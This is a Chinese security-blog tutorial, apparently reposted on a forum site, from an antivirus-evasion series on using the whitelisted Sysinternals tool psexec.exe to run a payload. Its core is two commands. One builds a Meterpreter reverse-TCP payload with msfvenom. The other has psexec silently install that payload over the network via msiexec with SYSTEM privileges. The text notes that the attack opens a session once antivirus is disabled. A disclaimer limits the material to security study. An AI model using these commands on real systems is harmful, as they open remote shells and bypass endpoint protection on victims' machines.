"/>
·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
DZ插件网 门户 网站安全 查看内容

远控免杀专题(52)-白名单psexec.exe执行payload

2022-8-3 22:10| 发布者: admin| 查看: 171| 评论: 0|原作者: 白帽子

摘要: 声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其...

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!


声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus


一、psexec.exe简介

PsExec是SysinternalsSuite的小工具之一,是一种轻量级的telnet替代品,允许在其他系统上执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件,并且可以获得与控制台应用程序相当的完全交互性。在windows系统并未默认安装,下载地址见参考文章。

二、psexec执行payload

生成木马:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.19.146 lport=23333 > /var/www/html/win_re.txt

psexec执行payload:

psexec.exe -s -d msiexec /q /i http://yourservice/shell/win_re.txt//-s 以system权限执行// -d 不产生交互式窗口

执行命令时360和火绒都会报警:

关闭杀毒软件,可正常建立会话:

vt免杀结果:

三、参考文章

psexec下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

psexec官方文档:https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec#using-psexec

psexec执行payload:https://micro8.github.io/Micro8-HTML/Chapter1/81-90/83_%E5%9F%BA%E4%BA%8E%E7%99%BD%E5%90%8D%E5%8D%95PsExec%E6%89%A7%E8%A1%8Cpayload%E7%AC%AC%E5%8D%81%E4%B8%89%E5%AD%A3.html




E


N


D





guān


zhù



men



Tide安全团队正式成立于2019年1月是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:





上一篇:远控免杀专题(50)-白名单winword.exe执行payload
下一篇:对话 MySQL 之父 Monty:超越 MySQL 很难,但我做到了!

鲜花

握手

雷人

路过

鸡蛋

评论

您需要登录后才可以发表言论 登录立即注册
创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:18.191.30.119,GMT+8, 2024-11-13 04:33 , Processed in 0.223063 second(s), 49 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯
扫一扫添加微信客服
QQ客服返回顶部
返回顶部